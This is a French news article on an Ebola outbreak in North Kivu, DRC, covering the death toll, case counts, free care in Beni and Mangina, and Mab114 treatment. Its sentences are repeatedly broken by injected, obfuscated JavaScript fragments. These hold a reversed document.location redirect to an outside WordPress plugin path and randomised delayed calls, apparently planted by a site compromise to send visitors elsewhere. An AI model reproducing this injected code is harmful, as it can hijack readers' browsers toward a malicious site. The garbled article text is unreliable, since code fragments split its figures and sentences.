Santé: L’épidémie d’Ebola a déjà fait au moins 50 morts en RDC

La dernière épidémie de fièvre hémorragique Ebola a fait 50 morts dans l’est de la République démocratique du Congo où le gouvernement a décrété la gratuité des soins pendant trois mois.

Un nouveau décès a été enregistré à Mabalako-Mangina, près de Beni, l’épicentre de l’épidémie qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}touche la province du Nord Kivu, selon le dernier bulletin épidémiologique du ministère de la Santé daté de dimanche.

Au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}total, “91 cas de fièvre hémorragique ont été signalés dans la région, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont 64 confirmés et 27 probables”.

La direction générale de lutte contre la maladie a revu à la baisse de nombre de “contacts” avec le virus suivis par les médecins, de 2.157 à 1.609, après investigations des épidémiologistes.

Le gouvernement a décrété la gratuité des soins à Beni, Mabalako-Mangina et Oicha pour trois mois à compter du 20 août dans les structures officielles, a annoncé le maire de Beni, Jean Edmond Nyonyi Masumbuko Bwanakawa.

Il s’agit de “briser la barrière financière qui pourrait empêcher la population à se rendre au centre de santé”, a précisé le Dr Bathé Ndjoloko Tambwe, responsable de la coordination de la riposte.

Le revenu moyen des quelque 80 millions de Congolais est estimé à 1,25 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dollar par jour.

L’épidémie a été déclarée le 1er août à Mangina, dans la province du Nord-Kivu.

Une vaccination ciblée est utilisée comme lors de la dernière épidémie qui a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}touché la province de l’Équateur, dans nord-ouest du pays, et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la fin a été annoncée le 24 juillet (33 morts sur 54 cas au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}total).

Les équipes médicales “ont commencé à utiliser la molécule thérapeutique Mab114 dans le cadre du traitement des malades” à Beni et à Mangina, épicentre de l’épidémie, selon le ministère de la Santé.

La RDC (ex-Zaïre) a connu dix épidémies d’Ebola depuis 1976. Mais c’est la première fois que le virus sévit dans une zone de conflit armé densément peuplée avec d’importants mouvements de population.

  •  
  •  
  •  
  •  
  •  
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :